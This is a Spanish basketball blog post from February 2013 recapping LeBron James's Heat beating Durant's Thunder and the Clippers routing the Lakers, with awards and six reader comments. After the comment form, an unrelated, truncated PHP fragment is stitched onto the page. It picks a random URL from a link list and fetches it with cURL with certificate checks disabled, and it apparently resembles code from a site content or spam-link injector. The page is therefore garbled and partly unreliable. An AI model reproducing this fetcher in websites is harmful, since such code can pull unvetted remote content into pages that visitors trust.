La Crónica: Nos vemos en las finales

15 de February de 2013 por txusma

Dos partidos pero ¡qué dos partidos! Por un lado el duelo de Los Angeles, algo descafeinado por el nivel actual de los Lakers y por el otro un Lebron James vs Kevin Durant, los dos únicos jugadores que ahora mismo optan al MVP de la temporada. Están muy por encima del resto y ayer lo volvieron a demostrar. La victoria se la llevaron los actuales campeones de la mano de un Lebron que ha pisado el acelerador justo antes del parón por el All Stars. Anotó 39 puntos pero se dejó por el camino la racha de partidos en más de 30 puntos y un 60% de acierto en tiros de campo. Ayer anotó 14 de 24, un 58%… Miami cogió una buena ventaja ya en el primer cuarto en parte porque Durant falló los 7 primeros tiros que intentó, y ya no la soltó en todo el partido. Los Thunder se llegaron a poner a 8 puntos en el último cuarto de nuevo por culpa de Durant (8 de 10 en ese período) que es el alfa y el omega del equipo, pero Lebron y sus compañeros no estaban dispuestos a echar por la borda el trabajo de todo el partido y amarraron fuerte la victoria (110-100). Heat y Thunder quedaron para verse de nuevo en las finales. De seguir así son, sin duda, los máximos favoritos al anillo. Lebron y Durant tienen la culpa. 

El otro duelo del día siguió una pauta parecida. Enorme primer cuarto de los Clippers que consiguieron ya 14 puntos de ventaja y esfuerzo titánico de los Lakers por seguir el ritmo. Se acercaron en el segundo cuarto pero en ese momento apareció Chauncey Billups y entre el final de la primera y el principio de la segunda parte, sentenció el encuentro (125-101). Los 125 puntos que encajaron los Lakers demuestran que la defensa sigue haciendo aguas por todas partes. Así no se puede.

PREMIOS

MVP: 39 puntos, 12 rebotes, 7 asistencias y 2 robos. Números al alcance solo de Lebron James. Chris Paul lideró a los Clippers con 24 puntos y 13 asistencias.

Sorpresa: Buen partido de Jodie Meeks con 13 puntos y 6 rebotes.

Decepción: Queda claro que Kevin Martin no es James Harden. El ex de los Rockets se quedó en 9 puntos. Jamal Crawford tampoco tuvo el día y se fue al vestuario con 8 puntos y un 3 de 11 en tiros de campo.

Esfuerzo en vano: Kevin Durant anotó 40 puntos, capturó 8 rebotes, repartió 4 asistencias y puso 3 tapones pero ante Lebron y compañía no fueron suficientes para llevarse la victoria.

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Simon dice:
    #1

    Sin verlo, el partido me da la impresión que fue calcado al de Navidad… Thunder empieza muy mal y poco a poco se va entonando pero Miami no los deja subirseles a las barbas…
    A día de hoy sinceramente no veo a Thunder capaz de meterle mano a Miami.

      Citar

  2. Jose Luis dice:
    #2

    Ni yo tampoco, pero es que a un Heat a su nivel muy pocos pueden meterle mano…

      Citar

  3. Denise dice:
    #3

    Tras ver el resumen, los Thunder pueden sentirse satisfechos, porque Durant se podía haber partido el brazo en una jugada perfectamente.

    Si Lebron sigue en este modo Super MVP y el resto no tienen lesiones, el anillo está asegurado. Si consiguieran un pivot medio en condiciones, este equipo podría marcar una dinastia en plan consegur como 3 anillos mas en los proximos 5 años.

    Sobre Lakers, no los doy aun por muertos y creo que se meteran en playoffs, pero si van a dar esta imagen tan lamentable, mejor que vayan ya reconstruyendo el equipo y traspasen a Nash, Pau y Howard.

    Bueno, y ahora la castaña infumable del All-Star donde solo me interesa un poco los triples (a ver si gana Anderson aunque apuesto por Novak). El resto, un aburrimiento. A ver si pasa pronto.

      Citar

  4. Denise dice:
    #4

    Ah, se me olvidó

    BILMAAAAAAAAA!!!!!!!

      Citar

  5. Ruxixón dice:
    #5

    El inicio del partido de los Thunder con un Durant -jamás lo había visto así- totalmente desquiciado con los árbitros y fallando todo dice ya del estado anímico con que afrontan los partidos contra MIami,eso ya supone una ventaja de los Heat sobre ellos.Por lo demás pedazo de partido.

      Citar

  6. franitis dice:
    #6

    Tres conclusiones (a mi parecer…):

    – Durant ha demostrado miedo escénico, pero se ha repuesto durante el partido, pero tiene que hacer un trabajo extra de motivación y psicología si no quiere que se convierta en algo crónico cada vez que se enfrente a “el Heat”…

    – Vaya profundidad de banquillo la de LAC, ahora con Billups recuperado dan más miedo… ¿Que no funciona Crawford? Pues allá va Billups para arreglarlo… Odom (en mejor condición ahora…), Bledsoe, Crawford, Billups… Si se lo creyeran, tendrían hasta opciones, pero no parecen tener el “poso” que sí tienen SAS, Heat o Thunder, que parecen candidatos más constantes.

    – Dwight Howard; ha perdido poder intimidador y no le respeta NADIE. Puede entrarle mi abuela con el balón intentando plantarle un mate en la cara y seguro que lo hace… Parece mentira cómo un ganador del premio al jugador defensivo del año durante tres años consecutivos no sea capaz de reinar en la zona… Y en ataque no digo nada tampoco. Que vale que si físicamente está mal y tal o cual, pero ahora mismo Howard tiene un montón de fantasmas en la cabeza (D’Antoni, Kobe, su salud, su confianza…). Necesita confianza en sí mismo o caerá en picado, y no parece que LAL sea el mejor lugar para recobrar su confianza, con la que está cayendo allí…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>